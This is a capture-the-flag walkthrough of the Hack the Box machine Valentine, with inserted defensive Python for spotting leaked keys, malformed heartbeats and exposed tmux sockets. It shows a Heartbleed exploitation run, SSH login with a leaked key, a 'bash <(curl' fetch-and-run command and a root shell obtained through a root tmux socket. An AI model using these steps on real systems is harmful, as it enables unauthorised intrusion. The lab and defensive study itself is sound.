Write-Up: HTB Valentine

Nov 23, 2020

Valentine is an easy Linux box on Hack the Box. Let’s jump right in!

First off, run my Mercon script (combines nmap and smbmap/gobuster depending on what the nmap scan finds).

Looking at the output, it looks like we have a basic webserver with an ssh port open.

kali@kali:~/development/Mercon$ ./mercon.py -t Valentine -i -w /usr/share/wordlists/dirb/common.txt 
===== Running Nmap Scan =====
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:35 EST
Nmap scan report for
Host is up (0.025s latency).
Not shown: 997 closed ports
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2020-11-14T22:37:04+00:00; +1m18s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 1m17s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.92 seconds

[+] Gobuster Running
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
2020/11/14 17:35:47 Starting gobuster
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/cgi-bin/ (Status: 403)
/decode (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)
2020/11/14 17:36:10 Finished

Time to check out the homepage before enumerating the directories we found with Gobuster. Nothing too interesting here, but it’s worth noting that the heart logo matches the Heartbleed vulnerability logo. Made a note of that and then began jumping into the various directories.

Checking out /dev, there are a few files available. First, let’s look at notes.txt to see if there’s any helpful info that’s been left behind.

The more interesting file is “hype_key” that is full of hex. Time to decode it and see what the developers left us.

Well, this is very nice of them to leave behind. It’s an SSH private key! Unfortunately, it’s password encrypted and attempting to brute force it didn’t work… Well, time to keep enumerating. Let’s jump back over to nmap and see if this server is actually vulnerable to the Heartbleed attack.

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
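
For the defender, a hex dump sitting in a web-served directory is still key material. The check below is an added example, not code from the original post: it decodes a hex blob and reports whether it contains a PEM private key and what its Proc-Type / DEK-Info headers say. The function name and the sample key (placeholder body and IV) are constructed for illustration.

```python
import re

PEM_RE = re.compile(
    rb"-----BEGIN ([A-Z0-9 ]*PRIVATE KEY)-----\r?\n(.*?)-----END \1-----", re.S)

def inspect_hex_blob(text):
    """Return a finding dict if hex text decodes to a PEM private key, else None."""
    try:
        raw = bytes.fromhex(text)   # whitespace between byte pairs is skipped
    except ValueError:
        return None                 # not a hex dump
    match = PEM_RE.search(raw)
    if not match:
        return None
    label = match.group(1).decode()
    body = match.group(2).replace(b"\r\n", b"\n")
    # Legacy PEM keeps RFC 1421-style headers before the first blank line.
    headers = {}
    head, sep, _ = body.partition(b"\n\n")
    if sep:
        for line in head.decode("ascii", "replace").splitlines():
            key, _, value = line.partition(":")
            headers[key.strip()] = value.strip()
    cipher, _, iv_hex = headers.get("DEK-Info", "").partition(",")
    if "ENCRYPTED" in headers.get("Proc-Type", "") or label.startswith("ENCRYPTED"):
        encrypted = True
    elif label == "OPENSSH PRIVATE KEY":
        encrypted = None            # encryption is recorded inside the blob
    else:
        encrypted = False
    return {"label": label, "encrypted": encrypted,
            "cipher": cipher or None, "iv_hex": iv_hex or None}

# Constructed sample: placeholder body and IV, not the key from the box.
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "Q09OU1RSVUNURUQgU0FNUExFIEJPRFk=\n"
    "-----END RSA PRIVATE KEY-----\n")
SAMPLE_HEX = " ".join(f"{b:02x}" for b in SAMPLE_PEM.encode())

if __name__ == "__main__":
    print(inspect_hex_blob(SAMPLE_HEX))
```

An encrypted result is still a finding: the key file has left the host, so the key pair should be rotated rather than relying on the passphrase.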


Lucky for us, it looks like the service is vulnerable :)

kali@kali:~/htb/valentine$ nmap -p 443 --script ssl-heartbleed
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 18:00 EST
Nmap scan report for
Host is up (0.024s latency).

443/tcp open https
| ssl-heartbleed:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://www.openssl.org/news/secadv_20140407.txt
|_ http://cvedetails.com/cve/2014-0160/

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
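
What the ssl-heartbleed check is looking for comes down to one missing length comparison. The sketch below is an added example, not code from the original post or from nmap: it classifies a plaintext TLS record and applies the RFC 6520 rule that the claimed heartbeat payload length plus padding must fit inside the record. It assumes the record is visible unencrypted (before the handshake completes, or at a TLS-terminating sensor); the function names and sample records are constructed.

```python
import struct

HEARTBEAT = 24       # TLS record content type for heartbeat (RFC 6520)
MIN_PADDING = 16     # RFC 6520 requires at least 16 bytes of padding

def classify_record(record):
    """Classify one plaintext TLS record by its heartbeat length fields."""
    if len(record) < 5:
        return "truncated"
    ctype, _version, rec_len = struct.unpack("!BHH", record[:5])
    if ctype != HEARTBEAT:
        return "not-heartbeat"
    body = record[5:5 + rec_len]
    if len(body) < rec_len:
        return "truncated"
    if rec_len < 3:
        return "malformed"           # no room for type + payload_length
    _hb_type, claimed = struct.unpack("!BH", body[:3])
    available = rec_len - 3          # bytes actually present after the 3-byte header
    # A vulnerable server trusts `claimed` and echoes that many bytes back,
    # reading past the end of the received record.
    if claimed > available:
        return "length-exceeds-record"
    if claimed + MIN_PADDING > available:
        return "missing-padding"
    return "ok"

def sample_record(claimed_len, payload, padding):
    """Build a constructed heartbeat request record to exercise the classifier."""
    body = struct.pack("!BH", 1, claimed_len) + payload + b"\x00" * padding
    return struct.pack("!BHH", HEARTBEAT, 0x0302, len(body)) + body

if __name__ == "__main__":
    for rec in (sample_record(4, b"ping", 16), sample_record(0x4000, b"", 0)):
        print(classify_record(rec))
```

RFC 6520 says a heartbeat whose payload_length is too large must be discarded silently, so a sensor that sees "length-exceeds-record" followed by a large heartbeat response has both the probe and the leak.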

Now it’s time to exploit. Copy the script from Exploit-DB and give it a go (I filtered out lines with empty bytes to reduce noise). The results show some $text variable that looks like it is base64 encoded.

I edited the script with the following to run the exploit 5 times, just to see if we get anything else from the server. Unfortunately, we didn’t find anything else.

if __name__ == '__main__':
    for x in range(5):

Decoding the text variable gets us the following string.

kali@kali:~/htb/valentine$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d

Let’s try this as the ssh key password and see where it gets us. And… it definitely gets us somewhere, a shell on the box!

kali@kali:~/htb/valentine$ ssh -i hype_key hype@
load pubkey "hype_key": invalid format
Enter passphrase for key 'hype_key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

* Documentation: https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from

Send over linpeas to see if we can find anything blatantly wrong that will allow us to escalate our privileges.

hype@Valentine:~/Desktop$ bash <(curl -s

Linpeas highlights a tmux process running as root. Looking it up on Google, looks like this is trivial to exploit and get root.

================================( Processes, Cron, Services, Timers & Sockets )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
102 550 0.0 0.1 24076 1252 ? Ss 14:35 0:00 dbus-daemon --system --fork --activation=upstart
avahi 617 0.0 0.0 32172 468 ? S 14:35 0:00 avahi-daemon: chroot helper
daemon 1038 0.0 0.0 16900 376 ? Ss 14:36 0:00 atd
hype 2602 0.0 0.1 92220 1672 ? S 15:13 0:00 sshd: hype@pts/0
hype 2603 0.0 0.8 31648 8768 pts/0 Ss 15:13 0:00 -bash
hype 2804 0.1 0.1 4776 1112 pts/0 S+ 15:19 0:00 /bin/sh ./linpeas.sh
hype 3355 0.0 0.1 22352 1276 pts/0 R+ 15:19 0:00 ps aux
hype 3357 0.0 0.0 19864 808 pts/0 S+ 15:19 0:00 sort
root 1 0.0 0.2 24428 2420 ? Ss 14:35 0:00 /sbin/init
root 1006 0.0 0.0 19976 976 tty2 Ss+ 14:36 0:00 /sbin/getty -8 38400 tty2
root 1007 0.0 0.0 19976 976 tty3 Ss+ 14:36 0:00 /sbin/getty -8 38400 tty3
root 1010 0.0 0.1 26416 1672 ? Ss 14:36 0:00 /usr/bin/tmux -S /.devs/dev_sess

Run tmux with the /.devs/dev_sess path for -S (socket-path) and we have root!

hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess

root@Valentine:/home/hype/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
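
The same finding can be turned into a host audit. The script below is an added example, not part of the original post: it pulls explicit -S socket paths of root-owned tmux servers out of ps aux output and reports sockets that group or other can write to, since write permission on a Unix socket is what lets a user connect. The function names are hypothetical, and the sample lines are copied from the process list above.

```python
import os
import stat

def root_tmux_sockets(ps_lines):
    """Return explicit -S socket paths of tmux servers running as root."""
    paths = []
    for line in ps_lines:
        fields = line.split(None, 10)    # ps aux: 10 columns, then the command
        if len(fields) < 11 or fields[0] != "root":
            continue
        argv = fields[10].split()
        if os.path.basename(argv[0]) != "tmux":
            continue
        for i, arg in enumerate(argv[1:], 1):
            if arg == "-S" and i + 1 < len(argv):
                paths.append(argv[i + 1])
            elif arg.startswith("-S") and len(arg) > 2:
                paths.append(arg[2:])    # attached form: -S/path
    return paths

def who_can_attach(mode):
    """List the non-owner classes with write permission on the socket."""
    classes = []
    if mode & stat.S_IWGRP:
        classes.append("group")
    if mode & stat.S_IWOTH:
        classes.append("other")
    return classes

def audit(ps_lines):
    """Return (path, gid, classes) for root tmux sockets others can write to."""
    findings = []
    for path in root_tmux_sockets(ps_lines):
        try:
            st = os.stat(path)
        except OSError:
            continue                     # socket gone or parent dir not readable
        exposed = who_can_attach(st.st_mode)
        if stat.S_ISSOCK(st.st_mode) and exposed:
            findings.append((path, st.st_gid, exposed))
    return findings

# Sample lines copied from the process list above.
SAMPLE_PS = [
    "root 1 0.0 0.2 24428 2420 ? Ss 14:35 0:00 /sbin/init",
    "hype 2603 0.0 0.8 31648 8768 pts/0 Ss 15:13 0:00 -bash",
    "root 1010 0.0 0.1 26416 1672 ? Ss 14:36 0:00 /usr/bin/tmux -S /.devs/dev_sess",
]

if __name__ == "__main__":
    print(root_tmux_sockets(SAMPLE_PS), audit(SAMPLE_PS))
```

A tmux server started without -S keeps its socket under a per-user directory in /tmp that only the owner can enter, so the explicit -S path is the case worth auditing; the fix is to keep root sessions on a root-only socket or close them.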

Overall, this was a fun box to go through. Thanks for reading!